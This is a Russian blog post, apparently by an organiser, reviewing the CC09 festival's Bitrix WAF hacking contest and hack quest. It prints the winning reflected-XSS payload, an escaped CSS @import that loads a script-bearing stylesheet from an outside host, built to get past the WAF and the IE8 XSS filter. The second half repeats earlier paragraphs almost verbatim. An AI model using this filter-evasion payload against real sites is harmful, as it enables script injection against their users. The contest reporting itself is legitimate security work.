Компьютерный фестиваль CC09 завершен. И после нескольких бессонных ночей начинаем просыпаться, приходить в себя, а потому самое время, чтобы подвести итоги и поделиться впечатлениями.
Мероприятие прошло на позитивной волне ( фотки ), многие работы (демо && realtime coding) произвели на меня сильное впечатление и оставили приятный шлейф, что присутствую в этом коллективе. Вообще, безусловно, не часто встретишь столько талантливых людей в одном месте. Атмосфера на фестивале была замечательная! Но и имели место быть разного рода косяки с падением каналов и пр. в том числе в хак-зоне... Но они, конечно же, не могли испортить хорошего настроения, в котором все прибывали :)
name='more'>
В этом году CC09 был гораздо масштабнее, чем в предыдущие годы. Например, можно было наблюдать за всем происходящим в режиме реального времени удаленно (трансляция фестиваля велась через youtube ). Также, в этом году свой вклад внесла команда Positive Technologies по тематике hack quest и realtime bitrix waf hack (совместно с разработчиками CMS Bitrix ). Так как тема по этим конкурсам мне близка, то о них дальше и пойдет речь.
Realtime Bitrix WAF Hack
Обойти Bitrix WAF пытались многие (более 25.000 попыток проведения атаки) и до последних минут завершения конкурса, но обойти фильтры от уязвимостей SQL Injection, Path Traversal/LFI так никто и не сумел. Однако пробить по трем векторам атаки Cross-Site Scripting двум участникам конкурса все-таки удалось. И таблица победителей выглядит следующим образом:
Первое место - Владимир Воронцов (ака d0znp ) сумел проэксплуатировать уязвимость типа "Межсайтовое выполнение сценариев" отраженного типа, в том числе, эксплуатация уязвимости была продемонстрирована в обход фильтра IE 8 xss filter. Действительно заслуженное первое место. А вот и сами запросы для атаки:
<style>@\69\6d\70\6f\72\74 'http://onsec.ru/xss.css';</style>
<div style="'\62\65\68\61\76\69\6F\72:">1</div>
Второе место занял человек, скрывающийся под псевдонимом " insa ". Он откопал отраженный XSS, причем ошибка содержалась только на игровом сервере (опечатка при подготовке сервера). Но условия конкурса были выполнены, поэтому "insa" получил заслуженное второе место.
Третье место решили отдать " ParanoidChaos ", который больше копал не waf, а саму CMSку Битрикс. И его раскопки позволили выявить пару незначительных багов "Раскрытие корневого каталога Web-сервера" в конфигурации отличной от дефолтовой (не на игровом сервере). За проявленный энтузиазм "ParanoidChaos" занял третье место и в момент вручения подарка (коммерческой версии Битрикс) сказал, что продолжит исследования по анализу защищенности этой CMS. Хочется надеяться, что исследования будут носить мирный характер, а не провокационный, как то hack video по эксплуатации XSS в Битриксе, которое демонстрировалось на главном экране фестиваля...(кстати уже fixed).
Hack Quest
В этом году, как я и обещал , был подготовлен интересный хак-квест, который со слов игроков всем понравился. Безусловно, приятно, что работа, которая выполнялась "с душой", была высоко оценена. Из всех подготовленных этапов хак-квеста, только один не смог пройти никто. Это этап по реверсингу программки crackme (главный разработчик систем ИБ в Positive Technologies сумел ее отреверсить за четыре часа). Таблица почета по конкурсу Hack Quest 09:
Первое место присвоено "r0b". Он сумел пройти все этапы конкурса, за исключением этапа с crackme. К сожалению, мы с ним попрощались в районе часа второго дня и на церемонию награждения он не вернулся. Поэтому награждали вторых по количеству заработанных очков это команда Antichat с результатом в минус один прошедших конкурсов и не раскопавших второго бонусного ключа. Подробности опубликованы на форуме CC .
ЗЫ: в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))
В целом мероприятие оставило хорошее впечатление, надеюсь, что большинство его со мной разделяют. До новых встреч на подобных мероприятиях!
Второе место занял человек, скрывающийся под псевдонимом " insa ". Он откопал отраженный XSS, причем ошибка содержалась только на игровом сервере (опечатка при подготовке сервера). Но условия конкурса были выполнены, поэтому "insa" получил заслуженное второе место.
Третье место решили отдать " ParanoidChaos ", который больше копал не waf, а саму CMSку Битрикс. И его раскопки позволили выявить пару незначительных багов "Раскрытие корневого каталога Web-сервера" в конфигурации отличной от дефолтовой (не на игровом сервере). За проявленный энтузиазм "ParanoidChaos" занял третье место и в момент вручения подарка (коммерческой версии Битрикс) сказал, что продолжит исследования по анализу защищенности этой CMS. Хочется надеяться, что исследования будут носить мирный характер, а не провокационный, как то hack video по эксплуатации XSS в Битриксе, которое демонстрировалось на главном экране фестиваля...(кстати уже fixed).
Hack Quest
В этом году, как я и обещал , был подготовлен интересный хак-квест, который со слов игроков всем понравился. Безусловно, приятно, что работа, которая выполнялась "с душой", была высоко оценена. Из всех подготовленных этапов хак-квеста, только один не смог пройти никто. Это этап по реверсингу программки crackme (главный разработчик систем ИБ в Positive Technologies сумел ее отреверсить за четыре часа). Таблица почета по конкурсу Hack Quest 09:
Первое место присвоено "r0b". Он сумел пройти все этапы конкурса, за исключением этапа с crackme. К сожалению, мы с ним попрощались в районе часа второго дня и на церемонию награждения он не вернулся. Поэтому награждали вторых по количеству заработанных очков это команда Antichat с результатом в минус один прошедших конкурсов и не раскопавших второго бонусного ключа. Подробности опубликованы на форуме CC .
ЗЫ: в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))
В целом мероприятие оставило хорошее впечатление, надеюсь, что большинство его со мной разделяют. До новых встреч на подобных мероприятиях!
